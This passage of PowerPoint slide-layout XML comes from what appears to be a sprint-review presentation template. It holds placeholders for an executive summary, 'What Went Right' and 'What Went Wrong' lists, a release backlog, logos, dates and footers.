      <p:ext uri="{954EB0E0-5547-4CBE-8F4A-B6373666959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xecutive Summary">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{B0741299-7000-47FF-A69A-6B884735CA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C39A36A-472F-497F-8F50-430C41493AB2}"/>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64A6C4E6-143B-4327-B845-93D86B4564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BB39BC-683F-4E02-B35E-B8AC0F14D890}"/>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20520DDF-3526-4A3D-96A1-72A5061089EB}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{EB79733A-D7FF-4606-ACFF-39EE41B831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2F0499-320E-4910-AD2B-6F2A7E17B26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{BFB6AB40-4053-4E26-9E56-CD5089EBF4F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AF94B7F-E3D4-4FA0-8352-F4E8905453A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="5795629" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="313131"/>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Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{62DB00A4-12CB-43F9-BBCE-67D5C932056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6F0EE44-FEE2-490B-8A06-FDBD112B35E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{51016FEA-39A5-4CFA-BA21-26F26E41DFB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6AC86AA-FCA7-494C-AFFF-B87C890FC4AC}"/>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7">
            <a:extLst>
              <a:ext uri="{2865A206-2B62-4EE8-83C3-83E853A0099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7DD9F56-CB2A-4883-BF34-36E57815ABA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1951386"/>
            <a:ext cx="5791456" cy="2971571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8">
            <a:extLst>
              <a:ext uri="{E6D7C603-0905-4921-8B0E-9EA16C1A13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4B90728-1E06-4100-A328-27B31936F0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>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10" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{74D4FFFC-2A9F-4362-8FB8-517A4A5203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E9AAF51-379A-410D-814B-F1D27606A233}"/>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D7D3EFBF-6FB4-4445-9B6B-AD4E3E68145C}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{EBC08976-ED9E-47EA-8F33-2F300DAFFF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AFE504F-F3D6-4822-B376-AA57F85E16C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="6"/>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7A4A73E2-1C58-4532-9BC9-B50107DFD1E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Rectangle 5">
            <a:extLst>
              <a:ext uri="{05DE4860-DA9F-4132-A698-07B1A5D0F6C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C7CE5D-82A9-4B44-811A-FCD8530CB3F1}"/>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B9802707-070B-4CB5-82E1-7B1C9E242D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B8EED7-577E-41EB-9AE1-DE0A9C20DFD2}"/>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2D7B8C45-C86F-42F8-9DB1-0FAA557F8A15}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{80AF1D8C-BC7A-4262-A034-51F3860B00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952807-D1DB-4EFC-AAFF-3FA455BFEB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{6E3B593A-8BCA-4DDC-B5AF-2089AF6342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4270C8-627C-4A04-B646-8BC84E2A1A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="7858125" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Headline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{BE5BC5D9-24D3-44B7-BC15-0D3279D3E1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8733BC-40BF-406E-9871-43FB5DA95577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1811726"/>
            <a:ext cx="7858125" cy="688586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Use this slide to outline what went right and what went wrong in the most recent sprint. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Be sure to include your plan for addressing the problematic list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{0C6512D6-1E12-4CDA-A136-DE8B0474F37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ED5C149-1F5A-48B0-B8EE-5BAA9B53D3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2714625"/>
            <a:ext cx="3714750" cy="500062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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What Went Right</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{840D5F22-859E-4633-98FF-39D3522159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A4F843-55D5-4360-9D36-C728D9BC0F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4519612" y="2714625"/>
            <a:ext cx="3714750" cy="500062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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What Went Wrong</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{21340D01-6938-4712-86C0-B901776E0A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AA3647-44B8-4BC7-B2F2-29E6A3DF05D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4519612" y="3248025"/>
            <a:ext cx="3714750" cy="1363684"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="190500" lvl="0" indent="-190500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{143A9242-6EB8-4294-A07C-9AC15B7AB9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F24C312-5B32-4CB8-A46A-670168445429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3248025"/>
            <a:ext cx="3714750" cy="1363684"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="190500" lvl="0" indent="-190500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Item 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{2A8E5BE1-D1BD-4EA6-845A-E570EC7E683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D5F27A-CE5A-490F-9900-6F0C9D863ADF}"/>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99782496-0C3A-46B5-86EC-5A7C33A1751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C235FA2-E7CF-44F6-AE2E-116DB1D71FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>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13" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{033D3DAD-E99E-4F81-B760-30AAC0B06E9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050E36-5F27-461E-AF23-60017BDC2F49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="9"/>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2200EA65-F75C-4797-BC73-C9B692696076}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{BF1C9A85-7212-47C5-8693-8427A4B1EAA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F87714-489A-4D03-8802-3D4E42202745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>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8AABCFFD-4B28-416A-9073-2F57FA156FF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elease Backlog">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{E76173E9-F15F-4325-A1F6-8CBCAF1A0E1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60DB746-8A42-4B4C-8551-F48BF2E79EE6}"/>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EE40B31E-19C1-4DF4-B711-9AA2120096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BD19A9-EC02-4B24-B073-CB862090826A}"/>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A6C4A40A-C148-479C-8339-9126F3BBDDE3}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{E98559CB-965F-4DCE-B89F-481A54DE416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14DCD60-A5EF-40E6-978C-4D4A2FB6FC96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{B7C353E1-94A7-4B74-A76D-B3CE54D9E3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F3F67BF-83DC-4E66-B8C4-25A866889ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="5334000" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Headline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 20">
            <a:extLst>
              <a:ext uri="{1E6DB97B-5212-4D1A-B7FB-23B24848F3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A01F73-E797-41F9-B85E-2966A30B20E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1811726"/>
            <a:ext cx="5334000" cy="688586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" baseline="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Use this slide to outline what went right and what went wrong in the most recent sprint. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Dosis Regular"/>
              </a:rPr>
              <a:t>Be sure to include your plan for addressing the problematic list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{EE0767CB-BA46-44E1-901A-C2B157D9DC9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8A2A410-47B2-4FD4-B69B-A58340AF73B6}"/>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22E28A7-E463-4A55-86B9-E36AE19295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7739F6-A238-44A4-9232-95927FC05A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>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9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{4202E6D7-3C9B-4CED-9824-64DB5D77896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0D8A23A-8342-4453-BA1E-5AE0EACB4B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2879493"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43687"/>
              <a:gd name="adj2" fmla="val 76571"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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A75CDB0D-60C0-4998-8150-4F1F7152176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15E174-1077-46FF-BF74-8E9B5B375604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922411" y="2879493"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 76571"/>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1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica 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932F3AFD-7C86-4A87-A833-91D5056D78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C4D5B4-E5B5-421D-83AE-31A51572B793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
